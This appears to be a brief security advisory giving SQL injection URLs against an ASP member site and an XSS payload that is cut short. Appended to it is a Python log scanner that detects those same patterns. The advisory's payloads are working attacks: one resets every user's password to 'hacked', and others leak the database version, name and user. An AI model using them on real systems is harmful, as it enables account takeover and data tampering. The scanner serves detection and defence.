Aria-Security Team
http://Aria-Security.Net
-----------------------------
Discovered By: Mormoroth
Shout outs: The-0utlaw for completing the vuln.

I. SQL Injection

http://site.ltd/myaccount/viewProfile.asp?member='update Members set ProfileName='hacked';--

This changes MemberList...

http://site.ltd/myaccount/viewProfile.asp?member='update Members set Password='hacked';--

This changes all the users' passwords to "hacked".

myaccount/psswd.asp has the same problem.

a' or 1=convert(int,@@version)--
a' or 1=convert(int,@@servername)--
a' or 1=convert(int,db_name())--
a' or 1=convert(int,user_name())--
a' or 1=convert(int,system_user)

Might be useful.

II. Cross Site Scripting:

failure.asp?err_txt=">

Advisory @ http://aria-security.net/forum/forumdisplay.php?f=60

Credits go to Aria-Security Team
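Added example, not part of the original advisory: a Python check that flags the request patterns listed above in web server logs, for the three pages the advisory names. The log field layout, the sample lines and the `user` parameter name for psswd.asp are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl

SQLI = [
    ("sqli-stacked-write", re.compile(r"'\s*(update|insert|delete|drop)\b", re.I)),
    ("sqli-error-based", re.compile(r"\bconvert\s*\(\s*int\s*,", re.I)),
    ("sqli-comment-tail", re.compile(r"'.*--\s*$", re.S)),
]
XSS = [("xss-markup", re.compile(r'[<>"]'))]

# Pages named in the advisory -> (parameters to inspect, rules to apply).
# None = inspect every parameter (the advisory names none for psswd.asp).
WATCHED = {
    "viewprofile.asp": ({"member"}, SQLI),
    "psswd.asp": (None, SQLI),
    "failure.asp": ({"err_txt"}, XSS),
}

# Constructed sample log; the W3C-style field layout is an assumption.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2024-01-01 10:00:00 192.0.2.10 GET /myaccount/viewProfile.asp member=alice 200
2024-01-01 10:00:05 192.0.2.66 GET /myaccount/viewProfile.asp member=%27update+Members+set+Password=%27hacked%27%3B-- 500
2024-01-01 10:00:09 192.0.2.66 GET /myaccount/psswd.asp user=a%27+or+1=convert(int,db_name())-- 500
2024-01-01 10:00:12 192.0.2.66 GET /failure.asp err_txt=%22%3E 200
2024-01-01 10:00:20 192.0.2.10 GET /failure.asp err_txt=Login+failed 200
"""

def scan_line(line):
    """Return (client_ip, page, parameter, rule) hits for one log line."""
    fields = line.split()
    if line.startswith("#") or len(fields) < 7:
        return []
    ip, stem, query = fields[2], fields[4], fields[5]
    page = stem.rsplit("/", 1)[-1].lower()
    if page not in WATCHED or query == "-":
        return []
    params, rules = WATCHED[page]
    hits = []
    # parse_qsl URL-decodes each value, so encoded quotes are seen as quotes.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if params is None or name.lower() in params:
            hits += [(ip, page, name, rule) for rule, rx in rules if rx.search(value)]
    return hits

def scan(log_text):
    return [hit for line in log_text.splitlines() for hit in scan_line(line)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```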